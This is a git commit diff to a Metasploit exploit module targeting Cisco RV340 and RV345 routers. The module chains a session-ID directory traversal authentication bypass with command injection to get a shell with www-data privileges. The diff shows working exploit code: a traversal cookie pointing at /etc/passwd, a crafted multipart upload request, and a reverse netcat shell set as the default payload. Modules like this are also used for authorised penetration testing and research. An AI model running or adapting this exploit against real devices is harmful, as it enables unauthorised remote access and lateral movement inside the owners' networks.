Update description and vulnerability listings. Cleaned up references. More randomization. Removed first unnecessary request in exploit portion of code. Added rescue section around json grabbing.

2023-02-08 21:26:18 -05:00 · 2023-02-08 21:26:18 -05:00 · 4b05ba6189
parent 427c181e9a
commit 4b05ba6189
1 changed files with 21 additions and 23 deletions
--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@ -17,29 +17,25 @@ class MetasploitModule < Msf::Exploit::Remote
        info,
        'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
        'Description' => %q{
-          This module exploits a sessionid directory traversal authentication bypass, a sessionid
-          improper input validation authentication bypass, and command injection on Cisco RV340 and
-          RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
-          at Sea Security.
-
-          This module works on firmware versions 1.0.03.24 and below
+          This module exploits two vulnerabilities, a session ID directory traversal authentication
+          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV340 and RV345
+          Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
+          This access can then be used to pivot to other parts of the network. This module works on firmware
+          versions 1.0.03.24 and below.
        },
        'License' => MSF_LICENSE,
        'Platform' => ['Linux', 'Unix'],
        'Author' => [
          'Biem Pham',  # Vulnerability Discoveries
          'Neterum',    # Metasploit Module
-          'jbaines-r7'  # This metasploit module is heavily inspired from
-          # cisco_rv_series_authbypass_and_rce.rb
+          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb
        ],
        'DisclosureDate' => '2021-11-02',
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'References' => [
-          [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
          [ 'CVE', '2022-20705'], # Authentication Bypass
          [ 'CVE', '2022-20707'], # Command Injection
-          [ 'ZDI', '22-409'], # Authentication Bypass
-          [ 'ZDI', '22-410'], # Path Traversal leading to Authentication Bypass
+          [ 'ZDI', '22-410'], # Authentication Bypass
          [ 'ZDI', '22-411']  # Command Injection
        ],
        'Targets' => [
@ -51,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
              'Type' => :unix_cmd,
              'Payload' => {},
              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+                'PAYLOAD' => 'cmd/unix/reverse_netcat',
+                'BadChars' => '\''
              }
            }
          ],
@ -110,26 +107,27 @@ class MetasploitModule < Msf::Exploit::Remote

    if target['Type'] != :unix_cmd
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
+      begin
        body_json = res.get_json_document
-      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
+        fail_with(Failure::NotFound, 'The target did not respond with a JSON body') unless body_json
+      rescue JSON::ParserError => e
+        print_error("Failed: #{e.class} - #{e.message}")
+        return nil
+      end
    end

    print_good('Exploit successfully executed.')
  end

  def send_exploit(cmd)
-    user = Rex::Text.rand_text_alphanumeric(5..12)
-    pass = Rex::Text.rand_text_alphanumeric(5..12)
    filename = Rex::Text.rand_text_alphanumeric(5..12)
    fileparam = Rex::Text.rand_text_alphanumeric(5..12)
    input = Rex::Text.rand_text_alphanumeric(5..12)

-    send_request_cgi({
-      'encode_params' => false,
-      'method' => 'POST',
-      'uri' => '/jsonrpc',
-      'data' => format('{"jsonrpc": "2.0", "method": "login", "params": {"user": "%<user>s", "pass": "%<pass>s"}}', user: user, pass: pass)
-    })
+    # sessionid utilized later needs to be set to length
+    # of 16 or exploit will fail.  Tested with lengths
+    # 14-17
+    sessionid = Rex::Text.rand_text_alphanumeric(16)

    filepath = '/tmp/upload.input'
    pathparam = 'Configuration'
@ -149,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'uri' => '/upload',
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'headers' => {
-        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
+        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=' + sessionid
      },
      'data' => multipart_form.to_s
    }, 10)